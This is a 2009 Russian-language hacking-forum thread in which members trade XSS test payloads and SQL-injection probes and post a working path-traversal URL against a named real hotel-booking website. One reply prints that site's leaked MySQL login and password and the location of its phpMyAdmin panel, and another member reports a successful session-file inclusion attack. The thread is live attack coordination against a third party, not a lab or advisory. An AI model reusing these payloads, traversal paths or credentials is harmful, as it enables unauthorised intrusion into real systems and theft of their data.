22.12.2009, 16:02
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
Всем привет. Я xss недавно начал изучать. Подскажите <script>alert()</script> я вбиваю вообще в любое поле на сайте? Так?
|
|
|
22.12.2009, 16:07
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от гаррет-тень
Всем привет. Я xss недавно начал изучать. Подскажите <script>alert()</script> я вбиваю вообще в любое поле на сайте? Так?
Универсальнее "><script>alert()</script> или '><script>alert()</script>
Что бы в случае чего,закрыть предидущий тег.В любом случае,лишним не будет,но может помочь.
Последний раз редактировалось m0Hze; 22.12.2009 в 16:10..
|
|
|
|
22.12.2009, 17:14
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
http://hotel.1000turov.ru/hoteld2.php?id=1294367249+order+by+1--
начинаю применять union+select и результатов нет, в чем проблема?
|
|
|
|
22.12.2009, 17:22
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от jecka3000
http://hotel.1000turov.ru/hoteld2.php?id=1294367249+order+by+1--
начинаю применять union+select и результатов нет, в чем проблема?
Подзапросы?
|
|
|
|
22.12.2009, 17:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/hotel.1000turov.ru/www/hoteld2.php
|
|
|
|
22.12.2009, 18:00
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами:
8730155
Репутация:
-1
|
|
Спасибо всем за подробные ответы,но есть ещё одна идейка.Используя вышеприведённые методы,нужно знать,значения каких переменных записывается в сессию...а двиг самописный.
Возникла идея скопировать код загружаемого скрипта в директорию,доступную для записи.Подозрения на невыполнение кода именно в директории загруженных файлов.Поскольку скрипты выполняются,можно попробовать последовательность команд,но не уверен...
P.S.: Файлы сессий 100% инклудятся и хранятся в /tmp (вчера проверял).Буду искать переменные сессий,поскольку двиг мне неизвестен.
|
|
|
|
22.12.2009, 18:33
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
m0Hze, а какие именно? Можешь привести примеры?)
Pashkela, спб, но если честно, я не понял что дает твой линк  |
|
|
|
22.12.2009, 18:50
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от jecka3000
m0Hze, а какие именно? Можешь привести примеры?)
Pashkela, спб, но если честно, я не понял что дает твой линк гораздо круче обычной скули, обычная читалка, но последствия ужасные для админа могут быть:
Код:
http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/1000turov.ru/www/inc/my.php
смотрим сорцы, а там:
<?php
$connection = mysql_connect("localhost", "ayen", "chobot");
mysql_select_db("chobot", $connection);
?>
ну и осталось только phpmyadmin найти, что тоже оказалось легко:
Код:
http://hotel.1000turov.ru/myadmin/
дел ровно на 1 минуту. Привелегии не проверял (но новую БД почему-то можно создавать, гы)
|
|
|
|
22.12.2009, 19:05
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами:
8730155
Репутация:
-1
|
|
Как ни странно,мой способ сработал))).Теперь смогу попробовать ваши(исходники теперь будут).Выражаю огромною благодарность ).
|
|
|
|
22.12.2009, 19:52
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами:
8730155
Репутация:
-1
|
|
мм,а если админка расположена за пределами docroot,то как к ней тогда вообще доступ получить ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
